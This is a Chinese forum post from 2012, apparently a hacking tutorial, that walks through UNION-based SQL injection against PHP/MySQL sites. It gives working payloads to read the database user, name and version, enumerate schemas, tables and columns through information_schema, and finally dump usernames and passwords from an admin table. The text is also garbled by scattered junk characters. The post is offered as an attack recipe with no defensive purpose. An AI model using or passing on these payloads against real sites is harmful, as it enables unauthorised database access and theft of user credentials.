/ b) Y) h8 F( \: [% m6 E教程内容:Mysql 5+php 注入
) s) x; B0 |3 O0 H" f' G2 W2 z
' _6 E2 m, i6 s' @' m# E9 |" j5 U% g' M' P# w; z. x' l$ O
4 g8 }* \& _# q( k/ [
一.查看MYSQL基本信息(库名,版本,用户)
3 p* `3 n8 `) z. Z+ s
7 _" c# a: `$ P' T6 q& D6 fand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
+ q p& Z: Y" E- @4 Q3 e
?* E2 g8 a; z4 n* e二.查数据库5 K2 \# ?3 j; @+ \6 {
~4 e W- _5 C" j; }; l3 aand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
, X- n4 q& d" L5 |9 _$ P2 Alimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。& S! m+ X. y3 `. J: r/ I4 V/ q
3 Z4 l F0 [5 b+ X0 c8 ^9 {三.暴表
; n: A" w% F' \' ~4 `! J+ s* S% R. I# o
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*. b1 N# ?; Z2 Y7 e9 m# J+ G
) l2 s" W3 d; h U4 T9 P ~7 I
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。7 ^6 p5 }/ a F6 w2 E
. T$ O+ ]) l; ^8 {+ J
四.暴字段
7 e" W: A: [2 [: O7 E9 o# G4 F: G
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*- s, m# Z" f$ f0 t' M- K4 ]: _0 `
) | r# s8 D6 l& B7 n8 R, wlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
. ?0 d2 c# K M# b
. Z* `( k; g5 `; w. _ d五.暴数据0 m3 x3 ~) w2 p7 a6 N/ p
+ v1 L0 S; O0 r! eand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*/ H/ J0 {& W0 S
' x7 m! |( {% v: J1 q& G7 B
3 x! ^1 s, w k: e8 q这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。0 k1 I* B& M0 k
|
发表于 2012-9-13 16:27:53
收藏
支持
反对